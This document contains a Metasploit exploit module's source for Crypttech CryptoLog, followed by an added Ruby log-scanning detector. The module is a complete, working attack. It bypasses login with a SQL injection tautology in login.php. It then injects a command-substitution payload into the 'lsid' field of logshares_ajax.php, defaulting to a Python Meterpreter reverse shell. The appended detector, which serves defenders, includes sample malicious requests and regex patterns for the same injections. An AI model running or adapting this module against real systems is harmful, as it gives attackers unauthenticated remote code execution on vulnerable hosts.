rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Crypttech CryptoLog Remote Code Execution",
        'Description' => %q{
          This module exploits a SQL injection and a command injection vulnerability in the PHP version of CryptoLog.
          An unauthenticated user can execute a terminal command under the context of the web user. These vulnerabilities
          are no longer present in the ASP.NET version of CryptoLog, available since 2009.

          CryptoLog's login.php endpoint is responsible for the login process. One of the user-supplied parameters is
          used by the application without input validation and parameter binding, which leads to a SQL injection
          vulnerability. Successfully exploiting this vulnerability gives a valid session.

          CryptoLog's logshares_ajax.php endpoint is responsible for executing an operating system command. It's not
          possible to access this endpoint without having a valid session. One user parameter is used by the
          application while executing an operating system command, which causes a command injection issue.

          Combining these vulnerabilities gives the opportunity to execute operating system commands under the context
          of the web user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Mehmet Ince <[email protected]>' # author & msf module
        ],
        'References' => [
          ['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
        ],
        'DefaultOptions' => {
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
        'Platform' => ['python'],
        'Arch' => ARCH_PYTHON,
        'Targets' => [[ 'Automatic', {}]],
        'Privileged' => false,
        'DisclosureDate' => '2017-05-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
      ]
    )
  end

  # Obtains a session cookie through the SQL injection in login.php. The
  # 'user' field is concatenated into the login query without binding, so a
  # tautology in it makes the query succeed regardless of the password.
  def bypass_login
    r = rand_text_alpha(15)
    i = rand_text_numeric(5)

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
      'vars_get' => {
        'act' => 'login'
      },
      'vars_post' => {
        'user' => "' OR #{i}=#{i}#",
        'pass' => "#{r}"
      }
    })

    # A successful login answers with a redirect and sets the session cookie.
    if res && res.code == 302 && res.headers.include?('Set-Cookie')
      res.get_cookies
    else
      nil
    end
  end

  def check
    if bypass_login.nil?
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Appears
    end
  end

  def exploit
    print_status("Bypassing login by exploiting SQLi flaw")

    cookie = bypass_login

    if cookie.nil?
      fail_with(Failure::Unknown, "Something went wrong.")
    end

    print_good("Successfully logged in")

    print_status("Exploiting command injection flaw")
    r = rand_text_alpha(15)

    # The 'lsid' field reaches a shell command unescaped in logshares_ajax.php,
    # so the payload is delivered through command substitution.
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
      'cookie' => cookie,
      'vars_post' => {
        'opt' => "check",
        'lsid' => "$(python -c \"#{payload.encoded}\")",
        'lssharetype' => "#{r}"
      }
    })
  end
end
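For defenders who need to recognise this activity in their own logs, the following Ruby script is an added example; it is not part of the Metasploit module above and not code from rapid7 or Crypttech. It parses a constructed, hypothetical log format of the form `<timestamp> <method> <path> body=<urlencoded form>` (real web servers rarely log POST bodies, so a WAF or application log is assumed), URL-decodes the form body the way the application would, and flags the two request shapes the module sends: a quote-and-tautology in the `user` field of `login.php`, and shell metacharacters in the `lsid` field of `logshares_ajax.php`. The log lines, field names and verdict labels are all constructed for the example.

```ruby
# Added example (not part of the Metasploit module): flag the login bypass
# and command injection request patterns in a constructed application log.
require 'uri'

# Constructed sample log, format assumed: "<ts> <method> <path> body=<form>".
# Line 2 carries the SQLi tautology in 'user'; line 4 carries command
# substitution in 'lsid'. The other lines are benign.
SAMPLE_LOG = <<~LOG
  2017-05-03T10:00:01Z POST /cryptolog/login.php?act=login body=user=admin&pass=s3cret
  2017-05-03T10:00:07Z POST /cryptolog/login.php?act=login body=user=%27+OR+48213%3D48213%23&pass=QbzRtLkWpVsNaHe
  2017-05-03T10:00:09Z POST /cryptolog/logshares_ajax.php body=opt=check&lsid=42&lssharetype=nfs
  2017-05-03T10:00:11Z POST /cryptolog/logshares_ajax.php body=opt=check&lsid=%24%28id%29&lssharetype=FkTqLmWpVsNaHej
  2017-05-03T10:00:15Z GET /cryptolog/index.php body=
LOG

LINE_RE = /\A(?<ts>\S+) (?<method>\S+) (?<path>\S+) body=(?<body>.*)\z/

# A quote that closes the string literal followed by an OR tautology,
# e.g. "' OR 1=1#" as used by the login bypass.
SQLI_RE = /'\s*or\s+\S+\s*=\s*\S+/i

# Command substitution, backticks or command separators in a value that the
# application hands to a shell.
CMD_INJ_RE = /\$\(|`|;|\|\|?|&&/

# Decode the form body as the application would; matching on the raw encoded
# string would miss '+' and %27-style variants of the same payload.
def decode_form(body)
  URI.decode_www_form(body).to_h
rescue ArgumentError
  {}
end

# Returns a verdict label for a suspicious line, or nil for a benign one.
def classify(line)
  m = LINE_RE.match(line)
  return nil unless m

  params = decode_form(m[:body])
  case m[:path]
  when %r{/cryptolog/login\.php}
    'sqli-login-bypass' if params['user'].to_s.match?(SQLI_RE)
  when %r{/cryptolog/logshares_ajax\.php}
    'cmdi-logshares' if params['lsid'].to_s.match?(CMD_INJ_RE)
  end
end

# Scan a whole log and return [timestamp, verdict] pairs for flagged lines.
def scan(log)
  log.each_line.with_object([]) do |line, hits|
    verdict = classify(line.chomp)
    hits << [line.split(' ', 2).first, verdict] if verdict
  end
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each { |ts, verdict| puts "#{ts} #{verdict}" }
end
```

Two points worth carrying into a real rule: decode before matching, since the same payload can arrive as `%27+OR` or `'%20OR`, and correlate the two verdicts by client and time, because the module sends them within seconds of each other and a login bypass immediately followed by a `logshares_ajax.php` request is a much stronger signal than either alone.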